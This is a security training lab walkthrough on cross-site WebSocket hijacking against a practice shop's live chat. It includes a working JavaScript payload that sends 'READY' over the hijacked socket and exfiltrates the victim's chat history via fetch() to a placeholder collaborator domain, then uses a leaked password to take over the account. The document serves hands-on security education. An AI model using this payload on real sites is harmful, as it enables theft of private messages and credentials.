This online shop has a live chat feature implemented using WebSockets.
To solve the lab, use the exploit server to host an HTML/JavaScript payload that uses a cross-site WebSocket hijacking attack to steal the victim's chat history, then gain access to their account.
Note
The obvious way to exfiltrate the victim's history is using Burp Collaborator. Note that you must use the public Burp Collaborator server (burpcollaborator.net).
In Burp Proxy, in the WebSockets history tab, observe that the "READY" command retrieves past chat messages from the server.
In Burp Proxy, in the HTTP history tab, find the WebSocket handshake request. Observe that the request has no CSRF tokens.
Right-click on the handshake request and select "Copy URL".
Visit the exploit server, and create a page with the following content, replacing your-websocket-URL with the URL from the WebSocket handshake, and your-collaborator-domain with a payload generated by Burp Collaborator Client. Note: Ensure you change the protocol in the WebSocket handshake URL from https:// to wss://.
<script>
websocket = new WebSocket('wss://your-websocket-URL')
websocket.onopen = start
websocket.onmessage = handleReply
function start(event) {
websocket.send("READY");
}
function handleReply(event) {
fetch('https://your-collaborator-domain/?'+event.data, {mode: 'no-cors'})
}
</script>
View the exploit page.
Poll for interactions using Burp Collaborator client. Verify that the attack has successfully retrieved your chat history and exfiltrated it via Burp Collaborator.
You should also see that another user has visited your exploit page, and that their chat history contains their password.
Log into the victim user's account.
Want to track your progress and have a more personalized learning experience? (It's free!)
